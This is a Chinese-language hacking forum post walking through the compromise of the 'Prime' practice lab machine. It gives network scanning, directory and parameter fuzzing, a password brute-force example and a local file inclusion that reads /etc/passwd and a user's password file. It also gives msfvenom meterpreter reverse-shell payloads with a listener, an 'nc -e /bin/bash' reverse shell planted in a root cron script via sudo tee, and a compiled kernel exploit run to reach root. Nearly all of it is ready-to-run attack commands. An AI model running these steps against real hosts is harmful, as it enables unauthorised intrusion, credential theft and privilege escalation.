Jump to content

  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

靶场Prime目标主机攻击

 Share
HACK1949

By HACK1949,
in ios/Android development

Recommended Posts

HACK1949 Grand Master

HACK1949

Posted
Posted
一、ping扫描C段 nmap -sP 192.168.178.1/24    ————》获取IP   二、端口扫描 nmap  -p 1-65535 -A 192.168.178.133   ——》获取80  22端口
补充:端口扫描其他方法 netdiscover -p arp-scan ?   三、目录扫描 dirb http://192.168.178.133   -->   获取index.php,image.php dirb http://192.168.178.133 -X .php,.txt,.zip   ———》获取secrt.txt文件 curl  http://192.168.178.133/secrt.txt  ——》获取fuzz方法获取参数提醒,获取location.txt文件提醒
补充学习:目录扫描其他方法 nikto -host 192.168.178.133    四、FUZZ获取参数名  wfuzz -w /usr/share/wfuzz/wordlist/genrual/commom.txt  http://192.168.178.133/index.php?FUZZ wfuzz -C -w /usr/share/wfuzz/wordlist/genrual/commom.txt  --hw 12 http://192.168.178.133/index.php?FUZZ ——》获取fuzz参数为file curl http://192.168.178.133/index.php?file=location.txt   ——》获取真实参数secrettier360
补充:fuzz的另一个应用场景——密码爆破 wfuzz -z file,user-dict(字典) -z file,pass-dict --hw 87 "http://192.168.142.139/manage.php?username=FUZZ&password=FUZ2Z"   五、LFI文件包含漏洞 curl http://192.168.178.133/image.php?secrettier360=/etc/passwd ——》saket:x:1001:1001:find password.txt file in my directory:/home/saket: curl http://192.168.178.133/image.php?secrettier360=/home/saket/password.txt ——》follow_the_ippsec   六、登录wp vitor和follow_the_ippsec cmseek -u http://192.168.178.133/wordpress/  ——》或者wordpress漏洞ThemeEditor wpscan --url http://192.168.178.133/wordpress --enumerate u   七、MSF生成payload反弹shell提权 1、 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.178.131 lport=7777 -o shell.php  ——》生成shell.php cat shell.php   放入网页上传 2、攻击机进入msfconsole msf6 > use exploit/multi/handler     //进入监听模块 set payload php/meterpreter/reverse_tcp set lhost 192.168.178.131 set lport 7777 exploit   开始监听   触发: http://192.168.178.133/wordpress/wp-content/themes/twentynineteen/secret.php 进入meterpreter >  
补充:java脚本生成比较 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.178.131 lport=7777 -o shell.php msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war   补充2:nc的用法开启监听 通过tee命令将恶意脚本写入tidyup.sh(某一计划任务执行的文件) 1、echo "nc -e /bin/bash 192.168.110.128  5555" > shell.php 2、cat shell.php | sudo /usr/bin/tee  /usr/share/cleanup/tidyup.sh     //sudo具有sudo普通用户执行root权限  攻击机开启监听:        nc -lvvp 5555   八、搜索目标机操作系统漏洞 msf6 > searchsploit 16.04 Ubuntu linux/local/45010.c   cd /usr/share/exploitdb/exploits/linux/local/ cp 45010.c /root cd /root gcc 45010.c -o 45010   meterpreter >upload /root/45010 /tmp/45010     //漏洞上传到目录 meterpreter > shell            python -c 'import pty;pty.spawn("/bin/bash")'   //以交互界面显示 cd /tmp chmod +x 45010 ./45010 whoami root cd /root cat root.txt b2b17036da1de94cfb024540a8e7075a
Link to post
Link to comment
Share on other sites
 Share
Go to topic listing

discussion group

discussion group

  
    You don't have permission to chat.

    • Recently Browsing   0 members

      • No registered users viewing this page.

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • Create New...